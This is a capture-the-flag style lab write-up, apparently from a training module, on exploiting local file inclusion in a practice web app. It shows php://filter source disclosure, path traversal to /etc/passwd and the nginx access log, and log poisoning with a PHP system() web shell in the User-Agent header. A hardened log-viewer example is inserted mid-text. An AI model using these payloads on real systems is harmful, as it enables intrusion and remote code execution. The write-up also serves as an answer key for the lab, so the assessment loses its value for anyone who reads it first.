Skills Assessment
Task
The company INLANEFREIGHT has contracted you to perform a web application assessment against one of their public-facing websites. They have been through many assessments in the past but have added some new functionality in a hurry and are particularly concerned about file inclusion/path traversal vulnerabilities.
They provided a target IP address and no further information about their website. Perform a full assessment of the web application checking for file inclusion and path traversal vulnerabilities.
Find the vulnerabilities and submit a final flag using the skills we covered in the module sections to complete this module.
Don’t forget to think outside the box!
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
Attempt
I found each page was accessed using the page parameter: http://94.237.57.18:35112/index.php?page=contact. This could be vulnerable to LFI.
Read index.php
http://94.237.57.18:35112/index.php?page=php://filter/convert.base64-encode/resource=index
Decoded the base64 data and found this portion of the source code:
<?php
// echo '<li><a href="ilf_admin/index.php">Admin</a></li>';
?>
Looks like a hidden URL.
Using the same method, accessed that page:
http://94.237.57.18:35112/index.php?page=php://filter/convert.base64-encode/resource=ilf_admin/index
Found parameters:
<li id="mtmi-menu" name="mtmi"><a href="index.php?log=http.log"><span>Service Log</span></a></li>
<li class="nav-header">Performance View</li>
<li id="monthinfo-menu" name="monthinfo"><a href="index.php?log=system.log"><span>System Log</span></a></li>
</ul>
And this classic LFI-vulnerable code, with no sanitization or validation:
<?php
if (isset($_GET['log'])) {
    // the user-supplied value is concatenated straight into the include path
    $log = "logs/" . $_GET['log'];
    echo "<pre>";
    include $log;
    echo "</pre>";
}
?>
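A hardened version of that handler, added here as an example and not the target application's code. It assumes the log files live in a logs/ directory beside the script and that only the two logs linked from the menu should ever be viewable.

```php
<?php
// Added example (not the assessment target's code): hardened replacement for
// the vulnerable ilf_admin/index.php log viewer shown above.
// Assumption: logs live in ./logs/ and only http.log and system.log exist.

declare(strict_types=1);

// 1. Allowlist: the ?log= parameter selects a key, never a path fragment.
const ALLOWED_LOGS = [
    'http.log'   => 'http.log',
    'system.log' => 'system.log',
];

function render_log(string $requested, string $logDir): string
{
    if (!array_key_exists($requested, ALLOWED_LOGS)) {
        http_response_code(400);
        return 'Unknown log';
    }

    $base = realpath($logDir);
    $path = realpath($logDir . DIRECTORY_SEPARATOR . ALLOWED_LOGS[$requested]);

    // 2. Defence in depth: the resolved file must stay inside the log directory,
    //    so no amount of ../ can reach /etc/passwd or /var/log/nginx/access.log.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(403);
        return 'Forbidden';
    }

    // 3. Never include() a data file. Read it and escape it, so a poisoned
    //    User-Agent line such as "<?php system($_GET['cmd']); ?>" is shown as
    //    text instead of being executed.
    $content = file_get_contents($path);
    if ($content === false) {
        http_response_code(404);
        return 'Log not available';
    }
    return '<pre>' . htmlspecialchars($content, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</pre>';
}

if (isset($_GET['log'])) {
    echo render_log((string) $_GET['log'], __DIR__ . '/logs');
}
```

The allowlist alone stops the traversal; the switch from include to file_get_contents plus escaping is what removes the log-poisoning path to code execution, since log contents are never parsed as PHP.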
Accessed this URL:
http://94.237.57.18:35112/ilf_admin/index.php?log=../../../../../../../etc/passwd
In the output, I found this line:
nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin
The server must use nginx.
Turned on Burp and accessed the access.log:
http://94.237.57.18:35112/ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log
The server log records each request's User-Agent header, like this:
10.30.18.38 - - [11/Mar/2025:08:53:48 +0000] "GET /ilf_admin/js/bootstrap.js HTTP/1.1" 404 188 "http://94.237.57.18:35112/ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
Because that header is client-controlled, sending a malicious User-Agent value poisons the log.
Let’s poison it by sending this simple payload as the User-Agent header:
<?php system($_GET['cmd']); ?>
A classic web shell you’ve seen more than your mum’s face.
Found the file flag_dacc60f2348d.txt, and inside it I found the flag.